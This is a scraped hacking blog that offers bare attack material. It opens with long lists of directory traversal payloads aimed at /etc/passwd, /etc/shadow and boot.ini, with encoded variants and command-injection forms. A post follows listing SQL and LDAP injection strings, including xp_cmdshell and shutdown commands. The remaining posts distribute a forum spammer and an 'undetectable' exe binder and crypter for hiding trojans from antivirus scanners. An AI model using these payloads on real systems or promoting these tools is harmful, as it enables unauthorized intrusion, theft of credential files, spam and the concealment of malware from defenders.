../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts ../../boot.ini /../../../../../../../../%2A ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow^^ /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\shadow /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\shadow %0a/bin/cat%20/etc/passwd %0a/bin/cat%20/etc/shadow /etc/passwd /etc/shadow ../../../../../../etc/passwd ../../../../../../etc/shadow /../../../../../../../../../../../etc/passwd.jpg /../../../../../../../../../../../etc/passwd.html /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c.. /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c.. %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c.. %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' ../../../../../../../../conf/server.xml /../../../../../../../../bin/id| C:/inetpub/wwwroot/global.asa C:\inetpub\wwwroot\global.asa C:/boot.ini C:\boot.ini ../../../../../../../../../../../../localstart.asp ../../../../../../../../../../../../localstart.asp ../../../../../../../../../../../../boot.ini ../../../../../../../../../../../../boot.ini /./././././././././././boot.ini /../../../../../../../../../../../boot.ini /../../../../../../../../../../../boot.ini /..\../..\../..\../..\../..\../..\../boot.ini /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini \..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini.html /../../../../../../../../../../../boot.ini.jpg /.../.../.../.../.../ ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
INJ3CTOR ( A R S H I )
.NET SOFTWARES, SOURCE, PHP SCRIPTS, EXPLOITS, REVERSED SOFT, SQL INJECTION, ATTACKS AND DEFENCES, DEFACEMENT, NETWORK SECURITY, WEB SECURITY, SOFTWARE ENCRYPTION, SECURE CODE WRITTING, BUFFER OVERFLOW, PHP INJECTIONS, SQL INJECTIONS, HTTP INJECTIONS, AJAX INJECTION, JAVASCRIPT INJECTIONS, CROSS SITE SCRIPTING, METASPLOIT, BACKTRACK, VIRTUAL BOX, MYSQL, ORACLE, MSACCESS, VULNERABILITIES
Thursday, August 9, 2012
Directory Traversal Attacks List
Some Good Sql Injection Strings
' " # - -- ' -- --'; ' ; = ' = ; = -- \x23 \x27 \x3D \x3B' \x3D \x27 \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * 'or select * admin'-- ';shutdown-- <>"'%;)(&+ ' or ''=' ' or 'x'='x " or "x"="x ') or ('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- "' or 1 --'" or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' " or 1=1 or ""=" ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% exec xp exec sp '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password \x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset <>"'%;)(&+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT '%20OR 'sqlattempt1 (sqlattempt2) | %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 & %26 ! %21 ' or 1=1 or ''=' ' or ''=' x' or 1=1 or 'x'='y / // //* */*
Thursday, October 20, 2011
Sunday, February 6, 2011
Port Scanner By Inj3ctor
Hi everyone this is port scanner by inj3ctor
Download Link
password:inj3ctor.blogspot.com
Virus Scan Rresult
Download Link
password:inj3ctor.blogspot.com
Virus Scan Rresult
Thursday, January 27, 2011
vBulletin Forum Spammer by Inj3ctor
Hi Everyone this is vBulletin Forum Spammer by inj3ctor
Download Link
Pass:inj3ctor.blogspot.com
Scan result:
http://vscan.novirusthanks.org/analysis/8d09651b86e5c1a99ba3a88e257c6c74/Zm9ydW0tcG9zdGVyLWV4ZQ==/
Download Link
Pass:inj3ctor.blogspot.com
Scan result:
http://vscan.novirusthanks.org/analysis/8d09651b86e5c1a99ba3a88e257c6c74/Zm9ydW0tcG9zdGVyLWV4ZQ==/
Tuesday, January 25, 2011
Exe Binder By Inj3ctor v1
Hi Everyone this is Exe Binder v1 by Inj3ctor and Fully Undetectable Free of Cost. Please Scan binded on vscan.novirusthanks.org with checking on don't submit for analysis else it will no more undetectable.
Download Link :
Password : inj3ctor.blogspot.com
Download Link :
Password : inj3ctor.blogspot.com
Monday, January 24, 2011
Scan Time Crypter V1 By Inj3ctor
Hi Everyone this is Scan Time Crypter v1 by Inj3ctor and Fully Undetectable Free of Cost. Please Scan your trojan on vscan.novirusthanks.org with checking on don't submit for analysis else it will no more undetectable
Download Link
pass: inj3ctor.blogspot.com
Scan Result
Download Link
pass: inj3ctor.blogspot.com
Scan Result
Subscribe to:
Posts (Atom)